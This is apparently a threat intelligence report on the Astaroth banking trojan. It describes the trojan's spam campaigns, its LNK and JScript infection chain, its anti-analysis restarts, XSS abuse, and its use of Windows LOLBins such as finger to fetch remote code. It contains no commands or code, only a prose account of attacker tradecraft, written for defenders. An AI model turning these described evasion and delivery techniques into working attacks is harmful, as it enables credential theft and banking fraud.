Threat Intelligence Team
Tempest’s Threat Intelligence team has observed and analyzed the banking trojan, Astaroth, amidst several threats that are part of our monitoring. In recent years, the threat has evolved its tools with a focus on anti-detection methods and the maintenance of its robust and diversified distribution chain. Recently, it was identified that Astaroth operators started to use the finger functionality from Windows and explore websites vulnerable to Cross-Site Scripting (XSS) attacks.
Astaroth, also known as Guildma, is a very prolific family of malware when it comes to sending malicious emails and infections to steal credentials. The threat is maintained by an agent known for spreading a banking trojan with Remote Access Tool (RAT) features, used to extract sensitive information from victims, among other malicious activities.
The infrastructure behind Astaroth is dynamic and very adaptable, it has resources that allow it to automate the installation and configuration of servers, in addition to using the services of companies that protect against DDoS attacks, such as Cloudflare. Trojan has a series of mechanisms that make it difficult to detect and analyze, and if the threat identifies the presence of a process related to security tools such as debuggers (OllyDbg, Windbg), process monitoring (Process Hacker, Process Monitor) and network monitoring (Wireshark), it will force the target machine to be restarted in an attempt to circumvent the protection mechanisms.
Massive spamming is one of the most striking features of Astaroth. In campaigns identified in late 2020, Tempest sensors recorded a rate of more than 1,000 spam emails being sent per minute in a single day of threat activity. The emails have a generic theme and draw the user’s attention by using brands with a good reputation in the market, such as Amazon, Aliexpress and public agencies. These emails contain attachments or malicious links that, when clicked, lead to the download of a file in the LNK format (Microsoft Windows shortcut), responsible for downloading a JScript file, which initiates the payload installation process.
The JScript has several layers of obfuscation, equipped with defined instructions to establish the communication with the command-and-control server (C2) through HTTP requests using the GET method. The main purpose of these requests is to recover the commands needed for the next stage of infection, which results in the delivery of Astaroth’s main payload in the form of a DLL.
In recent analyzes, Tempest identified that the agents behind the threat started to use the finger request in their attacks a few weeks ago in order to execute the malicious code remotely from the initial payload of the threat.
Finger is a utility that is part of Microsoft Windows and was developed for a local user to retrieve a list of users on a remote machine or information about a particular remote user, and when using it for malicious purposes, the utility is integrated in a long list of Windows components that can be used in attacks, which, in this context, are called LOLBins.
LOLBin is an acronym for Living-Off-the-Land binaries. In the context of malware development, it means using the resources already available in the operating system to conduct malicious activities. These components can be used for multiple purposes, ranging from executing code on an external server, to encrypting files.
In September 2020, security researchers had already documented a capability present in finger that would allow it to be used to download and run malicious files. In January of this year, experts warned about the use of finger by different attackers to download and install backdoors on the victims’ devices.
The use of tools classified as LOLBins is another feature common to Astaroth campaigns, such as the use of Windows Management Instrumentation (WMIC) in previous campaigns to download and run malicious artifacts in the background and the ExtExport used to load malicious DLLs associated with the trojan.
According to Tempest’s honeypots, about 10% of the Astaroth campaigns identified at the end of January were using XSS exploitation.
Another relevant update of the threat is related to the use of files with the LNK extension to infect victims’ computers. In previous campaigns, the initial payload executed a relatively large batch command, and it was obfuscated using the LNK shortcut. In recent campaigns, the group changed the payload to execute a simple, unobfuscated command, using finger, to invoke malicious code hosted on the threat servers.
Main events identified by Tempest
● Astaroth control panel allows you to control infected machines, receive notifications in real time when the victim accesses a financial institution and carry out transactions such as bank transfers and securities payments;
● Over 5,700 Astaroth phishing emails related to the COVID-19 theme were identified in Tempest’s honeypots;
● Astaroth campaign uses YouTube channel description to retrieve domains of command-and-control servers from parameters and commands stored in the “About” section.
● Operators of the threat start to operate on mobile devices with MegaDroid, a banking trojan that uses Android accessibility features.
● The analysis of the Astaroth distribution chain reveals a diversified infrastructure with great adaptability to propagate its campaigns, allowing hundreds of thousands of emails to be sent daily;
● Astaroth operators use stolen credentials to access domain creation and maintenance services, such as Registro.br, to create new DNS records in previously compromised domains, directing them to IP addresses protected by the Cloudflare service, hired by the attacker.
● Astaroth starts to exploit vulnerabilities in Cross-Site Scripting (XSS) and to use the Windows finger component to execute malicious code remotely.
The use of tools classified as living-off-the-land gives Astaroth campaigns a certain advantage in terms of anti-detection techniques. This evasive practice is not necessarily new, however, the use of the finger utility for threats of this kind is recent and potentially dangerous.
Tempest believes that the use of finger facilitates the execution of malicious code, since the main payload of the threat started to execute commands made available by the remote server, such as updates to the malware samples. Regarding the exploitation of websites vulnerable to Cross-site Scripting attacks, this is a measure that allows operators to hide the true origin of malicious files. However, since the use of this technique has been present in only a few spam campaigns, Tempest believes that this functionality is still in the testing phase.
The constant change in Astaroth’s tactics and infrastructure favors its quick adaptation and spread, making it the owner of one of the largest malware distribution chains by email in Brazil. Certainly, new events about this prolific threat will emerge in the cybercrime scene and Tempest will continue to follow these updates closely.